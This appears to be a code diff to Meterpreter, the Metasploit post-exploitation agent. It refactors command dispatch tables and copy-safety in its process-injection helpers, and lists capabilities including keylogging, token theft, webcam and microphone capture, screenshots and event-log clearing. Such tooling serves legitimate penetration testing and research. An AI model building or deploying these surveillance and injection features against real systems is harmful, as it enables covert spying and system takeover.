COMMAND_REQ( "stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate ),
COMMAND_REQ( "stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs ),
COMMAND_REQ( "stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs ),
// Registry
{ "stdapi_registry_load_key",
{ request_registry_load_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_unload_key",
{ request_registry_unload_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_open_key",
{ request_registry_open_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_open_remote_key",
{ request_registry_open_remote_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_create_key",
{ request_registry_create_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_enum_key",
{ request_registry_enum_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_delete_key",
{ request_registry_delete_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_close_key",
{ request_registry_close_key, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_set_value",
{ request_registry_set_value, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_query_value",
{ request_registry_query_value, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_query_class",
{ request_registry_query_class, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_enum_value",
{ request_registry_enum_value, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_registry_delete_value",
{ request_registry_delete_value, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_registry_load_key", request_registry_load_key ),
COMMAND_REQ( "stdapi_registry_unload_key", request_registry_unload_key ),
COMMAND_REQ( "stdapi_registry_open_key", request_registry_open_key ),
COMMAND_REQ( "stdapi_registry_open_remote_key", request_registry_open_remote_key ),
COMMAND_REQ( "stdapi_registry_create_key", request_registry_create_key ),
COMMAND_REQ( "stdapi_registry_enum_key", request_registry_enum_key ),
COMMAND_REQ( "stdapi_registry_delete_key", request_registry_delete_key ),
COMMAND_REQ( "stdapi_registry_close_key", request_registry_close_key ),
COMMAND_REQ( "stdapi_registry_set_value", request_registry_set_value ),
COMMAND_REQ( "stdapi_registry_query_value", request_registry_query_value ),
COMMAND_REQ( "stdapi_registry_query_class", request_registry_query_class ),
COMMAND_REQ( "stdapi_registry_enum_value", request_registry_enum_value ),
COMMAND_REQ( "stdapi_registry_delete_value", request_registry_delete_value ),
#endif
// Sys/config
{ "stdapi_sys_config_getuid",
{ request_sys_config_getuid, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_config_sysinfo",
{ request_sys_config_sysinfo, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_config_rev2self",
{ request_sys_config_rev2self, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_config_getprivs",
{ request_sys_config_getprivs, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_sys_config_getuid", request_sys_config_getuid ),
COMMAND_REQ( "stdapi_sys_config_sysinfo", request_sys_config_sysinfo ),
COMMAND_REQ( "stdapi_sys_config_rev2self", request_sys_config_rev2self ),
COMMAND_REQ( "stdapi_sys_config_getprivs", request_sys_config_getprivs ),
#ifdef _WIN32
{ "stdapi_sys_config_steal_token",
{ request_sys_config_steal_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_config_drop_token",
{ request_sys_config_drop_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_sys_config_steal_token", request_sys_config_steal_token ),
COMMAND_REQ( "stdapi_sys_config_drop_token", request_sys_config_drop_token ),
#endif
// Net
{ "stdapi_net_config_get_routes",
{ request_net_config_get_routes, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_net_config_add_route",
{ request_net_config_add_route, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_net_config_remove_route",
{ request_net_config_remove_route, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_net_config_get_interfaces",
{ request_net_config_get_interfaces, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_net_config_get_arp_table",
{ request_net_config_get_arp_table, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_net_config_get_netstat",
{ request_net_config_get_netstat, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_net_config_get_routes", request_net_config_get_routes ),
COMMAND_REQ( "stdapi_net_config_add_route", request_net_config_add_route ),
COMMAND_REQ( "stdapi_net_config_remove_route", request_net_config_remove_route ),
COMMAND_REQ( "stdapi_net_config_get_interfaces", request_net_config_get_interfaces ),
COMMAND_REQ( "stdapi_net_config_get_arp_table", request_net_config_get_arp_table ),
COMMAND_REQ( "stdapi_net_config_get_netstat", request_net_config_get_netstat ),
#ifdef WIN32
{ "stdapi_net_config_get_proxy",
{ request_net_config_get_proxy_config, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Resolve
{ "stdapi_net_resolve_host",
{ request_resolve_host, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_net_resolve_hosts",
{ request_resolve_hosts, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_net_resolve_host", request_resolve_host ),
COMMAND_REQ( "stdapi_net_resolve_hosts", request_resolve_hosts ),
#endif
// Socket
{ "stdapi_net_socket_tcp_shutdown",
{ request_net_socket_tcp_shutdown, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown ),
#ifdef _WIN32
// UI
{ "stdapi_ui_enable_mouse",
{ request_ui_enable_mouse, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_enable_keyboard",
{ request_ui_enable_keyboard, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_get_idle_time",
{ request_ui_get_idle_time, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_start_keyscan",
{ request_ui_start_keyscan, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_stop_keyscan",
{ request_ui_stop_keyscan, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_get_keys",
{ request_ui_get_keys, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_desktop_enum",
{ request_ui_desktop_enum, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_desktop_get",
{ request_ui_desktop_get, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_desktop_set",
{ request_ui_desktop_set, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_ui_desktop_screenshot",
{ request_ui_desktop_screenshot, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_ui_enable_mouse", request_ui_enable_mouse ),
COMMAND_REQ( "stdapi_ui_enable_keyboard", request_ui_enable_keyboard ),
COMMAND_REQ( "stdapi_ui_get_idle_time", request_ui_get_idle_time ),
COMMAND_REQ( "stdapi_ui_start_keyscan", request_ui_start_keyscan ),
COMMAND_REQ( "stdapi_ui_stop_keyscan", request_ui_stop_keyscan ),
COMMAND_REQ( "stdapi_ui_get_keys", request_ui_get_keys ),
COMMAND_REQ( "stdapi_ui_desktop_enum", request_ui_desktop_enum ),
COMMAND_REQ( "stdapi_ui_desktop_get", request_ui_desktop_get ),
COMMAND_REQ( "stdapi_ui_desktop_set", request_ui_desktop_set ),
COMMAND_REQ( "stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot ),
// Event Log
{ "stdapi_sys_eventlog_open",
{ request_sys_eventlog_open, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_eventlog_numrecords",
{ request_sys_eventlog_numrecords, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_eventlog_read",
{ request_sys_eventlog_read, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_eventlog_oldest",
{ request_sys_eventlog_oldest, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_eventlog_clear",
{ request_sys_eventlog_clear, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "stdapi_sys_eventlog_close",
{ request_sys_eventlog_close, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "stdapi_sys_eventlog_open", request_sys_eventlog_open ),
COMMAND_REQ( "stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords ),
COMMAND_REQ( "stdapi_sys_eventlog_read", request_sys_eventlog_read ),
COMMAND_REQ( "stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest ),
COMMAND_REQ( "stdapi_sys_eventlog_clear", request_sys_eventlog_clear ),
COMMAND_REQ( "stdapi_sys_eventlog_close", request_sys_eventlog_close ),
{ "stdapi_sys_power_exitwindows",
{ request_sys_power_exitwindows, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Power
COMMAND_REQ( "stdapi_sys_power_exitwindows", request_sys_power_exitwindows ),
// Webcam
{ "webcam_list",
{ request_webcam_list, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "webcam_start",
{ request_webcam_start, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "webcam_get_frame",
{ request_webcam_get_frame, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
{ "webcam_stop",
{ request_webcam_stop, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "webcam_list", request_webcam_list ),
COMMAND_REQ( "webcam_start", request_webcam_start ),
COMMAND_REQ( "webcam_get_frame", request_webcam_get_frame ),
COMMAND_REQ( "webcam_stop", request_webcam_stop ),
// Audio
{ "webcam_audio_record",
{ request_ui_record_mic, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "webcam_audio_record", request_ui_record_mic ),
#endif
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_TERMINATOR
};
/*
@ -477,15 +183,7 @@ DWORD InitServerExtension(Remote *remote)
#ifdef _WIN32
hMetSrv = remote->hMetSrv;
#endif
for (index = 0;
customCommands[index].method;
index++)
{
dprintf("Registering command index %d", index);
dprintf(" Command: %s", customCommands[index].method);
dprintf(" Register: 0x%.8x", command_register);
command_register(&customCommands[index]);
}
command_register_all( customCommands );
return ERROR_SUCCESS;
}
@ -499,12 +197,7 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
DWORD DeinitServerExtension(Remote *remote)
#endif
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
command_deregister_all( customCommands );
return ERROR_SUCCESS;
}

48
c/meterpreter/source/extensions/stdapi/server/sys/config/config.c

@ -363,26 +363,36 @@ DWORD request_sys_config_sysinfo(Remote *remote, Packet *packet)
else if (v.dwMinorVersion == 2)
osName = "Windows .NET Server";
}
else if (v.dwMajorVersion == 6 && v.dwMinorVersion == 0)
else if (v.dwMajorVersion == 6)
{
if (v.wProductType == VER_NT_WORKSTATION)
osName = "Windows Vista";
else
osName = "Windows 2008";
}
else if (v.dwMajorVersion == 6 && v.dwMinorVersion == 1)
{
if (v.wProductType == VER_NT_WORKSTATION)
osName = "Windows 7";
else
osName = "Windows 2008 R2";
}
else if (v.dwMajorVersion == 6 && v.dwMinorVersion == 2)
{
if (v.wProductType == VER_NT_WORKSTATION)
osName = "Windows 8";
else
osName = "Windows 2012";
if (v.dwMinorVersion == 0)
{
if (v.wProductType == VER_NT_WORKSTATION)
osName = "Windows Vista";
else
osName = "Windows 2008";
}
else if (v.dwMinorVersion == 1)
{
if (v.wProductType == VER_NT_WORKSTATION)
osName = "Windows 7";
else
osName = "Windows 2008 R2";
}
else if (v.dwMinorVersion == 2)
{
if (v.wProductType == VER_NT_WORKSTATION)
osName = "Windows 8";
else
osName = "Windows 2012";
}
else if (v.dwMinorVersion == 3)
{
if (v.wProductType == VER_NT_WORKSTATION)
osName = "Windows 8.1";
else
osName = "Windows 2012 R2";
}
}
if (!osName)

14
c/meterpreter/source/extensions/stdapi/server/sys/process/image.c

@ -199,7 +199,7 @@ DWORD request_sys_process_image_get_images(Remote *remote, Packet *packet)
Packet *response = packet_create_response(packet);
HMODULE *modules = NULL;
BOOLEAN valid = FALSE;
HANDLE psapi = NULL;
HMODULE psapi = NULL;
HANDLE handle;
DWORD result = ERROR_SUCCESS;
DWORD needed = 0, actual, tries = 0;
@ -351,6 +351,7 @@ DWORD remote_load_library(HANDLE process, LPCSTR image, HMODULE *base)
LoadLibraryContext *context = NULL;
DWORD result = ERROR_SUCCESS;
DWORD contextSize = 0;
DWORD imagePathSize = 0;
BYTE loadLibraryStub[] =
"\x8b\x54\x24\x04" // see load_library_stub
"\x8d\x5a\x04"
@ -361,7 +362,8 @@ DWORD remote_load_library(HANDLE process, LPCSTR image, HMODULE *base)
do
{
// Calculate the size of the context we'll be passing
contextSize = (DWORD)strlen(image) + 1 + sizeof(LoadLibraryContext);
imagePathSize = (DWORD)strlen(image) + 1;
contextSize = imagePathSize + sizeof(LoadLibraryContext);
if (!(context = (LoadLibraryContext *)malloc(contextSize)))
{
@ -373,7 +375,7 @@ DWORD remote_load_library(HANDLE process, LPCSTR image, HMODULE *base)
context->loadLibraryAddress = (PVOID)GetProcAddress(
GetModuleHandle("kernel32"), "LoadLibraryA");
strcpy(context->imagePath, image);
strcpy_s(context->imagePath, imagePathSize, image);
// Execute the LoadLibraryA stub
result = execute_code_stub_in_process(process, (PVOID)loadLibraryStub,
@ -398,6 +400,7 @@ DWORD remote_get_proc_address(HANDLE process, HMODULE module,
GetProcAddressContext *context = NULL;
DWORD result = ERROR_SUCCESS;
DWORD contextSize = 0;
DWORD symbolSize = 0;
BYTE getProcAddressStub[] =
"\x8b\x54\x24\x04" // see unload_library_stub
"\x8b\x5a\x04"
@ -410,7 +413,8 @@ DWORD remote_get_proc_address(HANDLE process, HMODULE module,
do
{
// Calculate the size of the context we'll be passing
contextSize = strlen(symbol) + 1 + sizeof(GetProcAddressContext);
symbolSize = (DWORD)strlen(symbol) + 1;
contextSize = symbolSize + sizeof(GetProcAddressContext);
if (!(context = (GetProcAddressContext *)malloc(contextSize)))
{
@ -423,7 +427,7 @@ DWORD remote_get_proc_address(HANDLE process, HMODULE module,
GetModuleHandle("kernel32"), "GetProcAddress");
context->module = module;
strcpy(context->symbol, symbol);
strcpy_s(context->symbol, symbolSize, symbol);
// Execute the LoadLibraryA stub
result = execute_code_stub_in_process(process, (PVOID)getProcAddressStub,

5
c/meterpreter/source/extensions/stdapi/server/sys/process/ps.c

@ -308,7 +308,7 @@ BOOL ps_getpath( DWORD pid, char * cpExePath, DWORD dwExePathSize, char * cpExeN
{
name = strrchr( cpExePath, '\\' );
if( name )
strncpy( cpExeName, name+1, dwExeNameSize );
strncpy( cpExeName, name+1, dwExeNameSize - 1 );
}
success = TRUE;
}
@ -639,6 +639,9 @@ void parse_status(char * buffer, struct info_process * info) {
strncpy(info->name, str+strlen(NAME), sizeof(info->name)-1);
if ( strncmp(str, STATE, strlen(STATE)) == 0 ) {
// TODO: rather than use strncpy for 1 char, why can't
// we just write the one char given the state is already zeroed?
// info->state[0] = str[strlen(STATE)];
strncpy(info->state, str+strlen(STATE), 1); // want only 1 char
}

2
c/meterpreter/source/extensions/stdapi/server/ui/desktop.c

@ -386,7 +386,7 @@ DWORD request_ui_desktop_screenshot( Remote * remote, Packet * request )
dprintf( "[UI] desktop_screenshot. dwCurrentSessionId=%d, dwActiveSessionId=%d, cCommandLine=%s\n", dwCurrentSessionId, dwActiveSessionId, cCommandLine );
// start a thread to create a named pipe server and wait for a client to connect an send back the JPEG screenshot.
pPipeThread = thread_create( desktop_screenshot_thread, &cNamedPipe, response );
pPipeThread = thread_create( desktop_screenshot_thread, &cNamedPipe, response, NULL );
if( !pPipeThread )
BREAK_WITH_ERROR( "[UI] desktop_screenshot. thread_create failed", ERROR_INVALID_HANDLE );

5
c/meterpreter/source/extensions/stdapi/stdapi.h

@ -419,6 +419,11 @@
TLV_META_TYPE_UINT, \
TLV_TYPE_EXTENSION_STDAPI, \
1444)
// Proxy configuration
#define TLV_TYPE_PROXY_CFG_AUTODETECT MAKE_CUSTOM_TLV(TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 1445)
#define TLV_TYPE_PROXY_CFG_AUTOCONFIGURL MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 1446)
#define TLV_TYPE_PROXY_CFG_PROXY MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 1447)
#define TLV_TYPE_PROXY_CFG_PROXYBYPASS MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 1448)
// Socket
#define TLV_TYPE_PEER_HOST \

6
c/meterpreter/source/server/metsrv.h

@ -30,12 +30,14 @@
#endif
DWORD server_setup(SOCKET fd);
typedef DWORD (*PSRVINIT)(Remote *remote);
typedef DWORD (*PSRVDEINIT)(Remote *remote);
typedef struct _EXTENSION
{
HMODULE library;
DWORD (*init)(Remote *remote);
DWORD (*deinit)(Remote *remote);
PSRVINIT init;
PSRVDEINIT deinit;
} EXTENSION;
#endif

21
c/meterpreter/source/server/remote_dispatch_common.c

@ -12,19 +12,10 @@ extern HINSTANCE hAppInstance;
LIST * extension_list = NULL;
// Dispatch table
Command custom_commands[] =
Command customCommands[] =
{
{
"core_loadlib",
{ request_core_loadlib, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REQ( "core_loadlib", request_core_loadlib ),
COMMAND_TERMINATOR
};
/*
@ -36,8 +27,7 @@ VOID register_dispatch_routines()
extension_list = list_create();
for( index=0 ; custom_commands[index].method ; index++ )
command_register( &custom_commands[index] );
command_register_all( customCommands );
}
/*
@ -58,8 +48,7 @@ VOID deregister_dispatch_routines( Remote * remote )
free( extension );
}
for( index=0 ; custom_commands[index].method ; index++ )
command_deregister( &custom_commands[index] );
command_deregister_all( customCommands );
list_destroy( extension_list );
}

16
c/meterpreter/source/server/server_setup.c

@ -355,11 +355,10 @@ static DWORD server_dispatch( Remote * remote )
break;
}
cpt = thread_create( command_process_thread, remote, packet );
if( cpt )
if( !command_handle( remote, packet ) )
{
dprintf( "[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle );
thread_run( cpt );
dprintf( "[DISPATCH] command_process indicated server stop. Exiting." );
break;
}
}
else if( result < 0 )
@ -502,12 +501,11 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
dprintf("[DISPATCH] Returned result: %d", result);
cpt = thread_create( command_process_thread, remote, packet );
if( cpt )
if( !command_handle( remote, packet ) )
{
dprintf( "[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle );
thread_run( cpt );
}
dprintf( "[DISPATCH] command_process indicated server stop. Exiting." );
break;
}
}
// Close WinInet handles

2
c/meterpreter/source/server/win/libloader.c

@ -562,7 +562,7 @@ HMODULE libloader_load_library(LPCSTR name, PUCHAR buffer, DWORD bufferLength)
do
{
// The name of the library to load it as
strncpy(ctx->libname, shortName, sizeof(ctx->libname));
strncpy(ctx->libname, shortName, sizeof(ctx->libname) - 1);
ctx->liblen = (int)strlen(ctx->libname) + 1;
// The address of the raw buffer

8
c/meterpreter/source/server/win/remote_dispatch.c

@ -102,13 +102,13 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
// if the library was loaded via its reflective loader we must use GetProcAddressR()
if( bLibLoadedReflectivly )
{
extension->init = (LPVOID)GetProcAddressR( extension->library, "InitServerExtension" );
extension->deinit = (LPVOID)GetProcAddressR( extension->library, "DeinitServerExtension" );
extension->init = (PSRVINIT)GetProcAddressR( extension->library, "InitServerExtension" );
extension->deinit = (PSRVDEINIT)GetProcAddressR( extension->library, "DeinitServerExtension" );
}
else
{
extension->init = (LPVOID)GetProcAddress( extension->library, "InitServerExtension" );
extension->deinit = (LPVOID)GetProcAddress( extension->library, "DeinitServerExtension" );
extension->init = (PSRVINIT)GetProcAddress( extension->library, "InitServerExtension" );
extension->deinit = (PSRVDEINIT)GetProcAddress( extension->library, "DeinitServerExtension" );
}
// patch in the metsrv.dll's HMODULE handle, used by the server extensions for delay loading

18
c/meterpreter/workspace/ReflectiveDLLInjection/ReflectiveDLLInjection.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -44,45 +44,45 @@
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">

10
c/meterpreter/workspace/backcompat/backcompat.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -28,27 +28,27 @@
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">

18
c/meterpreter/workspace/common/common.vcxproj

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -43,49 +43,49 @@
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v110_xp</PlatformToolset>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseOfMfc>false</UseOfMfc>
